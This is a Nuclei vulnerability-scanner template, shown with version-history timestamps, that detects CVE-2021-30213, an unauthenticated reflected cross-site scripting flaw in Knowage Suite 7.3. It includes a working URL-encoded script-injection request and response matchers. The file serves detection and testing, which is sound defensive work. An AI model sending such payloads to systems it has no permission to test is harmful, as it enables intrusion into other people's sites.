nuclei-templates/http/cves/2021/CVE-2021-30213.yaml

52 lines
2.1 KiB
YAML
Raw Permalink Normal View History

2021-11-24 15:43:59 +00:00
id: CVE-2021-30213
info:
name: Knowage Suite 7.3 - Cross-Site Scripting
2021-11-24 15:43:59 +00:00
author: alph4byt3
severity: medium
description: Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3.
reference:
- https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-30213
- https://github.com/piuppi/Proof-of-Concepts
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-30213
cwe-id: CWE-79
epss-score: 0.00106
2024-05-31 19:23:20 +00:00
epss-percentile: 0.43249
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: eng
product: knowage
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,xss,knowage,eng
2021-11-24 15:43:59 +00:00
http:
2021-11-24 15:43:59 +00:00
- method: GET
path:
2021-12-03 07:23:01 +00:00
- "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-11-24 15:43:59 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2021-12-03 07:23:01 +00:00
words:
- '</script><script>alert(document.domain)</script>'
2021-11-24 15:43:59 +00:00
- type: word
part: header
words:
- text/html
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100b78beb00cb5e1cb54a9e2d93c1d9985befc910a93a89ed8e983d69e5cf3c2e5f02207b0787b48190812075455ab8195ffde78e40bdf8cc8c009ee355a2b79e8f6088:922c64590222798bb761d5b6d8e72950